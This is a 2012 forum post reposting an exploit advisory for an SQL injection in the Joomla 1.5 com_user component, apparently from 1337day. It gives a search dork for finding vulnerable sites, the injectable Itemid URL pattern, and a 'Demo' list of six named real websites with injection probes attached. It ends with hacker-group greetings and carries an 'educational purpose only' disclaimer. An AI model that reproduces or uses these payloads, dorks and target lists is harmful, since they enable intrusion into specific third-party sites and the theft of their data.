20.12.2012, 21:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
216062
Репутация:
231
|
|
Joomla All v1.5 Error Based SQL Injection Vulnerability
Joomla Component com_user
####
# Exploit Title: Joomla All v1.5 Error Based SQL Injection Vulnerability
# Author: Caddy-Dz
# Facebook Page: https://www.facebook.com/Algerian.Cyber.Army
# E-mail: islam_babia@hotmail.com
# Category:: webapps
# script home : http://joomla.com
# Dork : inurlption=com_user
# Security Risk: critical
# Tested on: Back|Track 5 KDE / French
####
# this was written for educational purpose only. use it at your own risk.
# author will be not responsible for any damage caused! user assumes all responsibility
# intended for authorized web application pentesting only!
// Description :
the affected component is /com_user/ in all joomla v1.5
P.S : you could know the version by openning the source code of the target and searching for "joomla" you'll see the version
// Exploit :
http://site.com/index.php?option=com_user&view=reset&lang=en&Itemi d=1+(sql injection)
http://site.com/index.php?option=com_user&view=reset&lang=en&Itemi d=x+(sql injection) [replacing id number by character]
# priv8 youtube link, just people who has the link could view :
http://www.youtube.com/watch?v=g0QcjxIb68I
// Demo :
http://www.lyceeairbus.com/index.php?option=com_user&view=reset&lang=en&Itemi d=1'
http://www.silviajewelry.com/index.php?option=com_user&view=reset&Itemid='
http://www.bklogisticsvn.com/index.php?option=com_user&view=reset&lang=en&Itemi d='
http://algeria.ch/index.php?option=com_user&view=reset&lang=en&Itemi d='
http://www.emissary.com/index.php?option=com_user&view=reset&lang=en&Itemi d='
http://lookdezine.com/main/index.php?option=com_user&view=reset&lang=en&Itemi d='
# Greets To : ================================================== ============================
# The Algerian Cyber Army Team , KedAns-Dz , Klashincov3 , Kha&Mix , King Of Pirates ,
# D4NB4R , Inj3ct0r Team , jos_ali_joe , exploit-id team , OWASP Algeria
# ... And All Algerian Hax0rs
================================================== ==========================================
# 1337day.com [2012-12-12][/quote]
|
|
|
|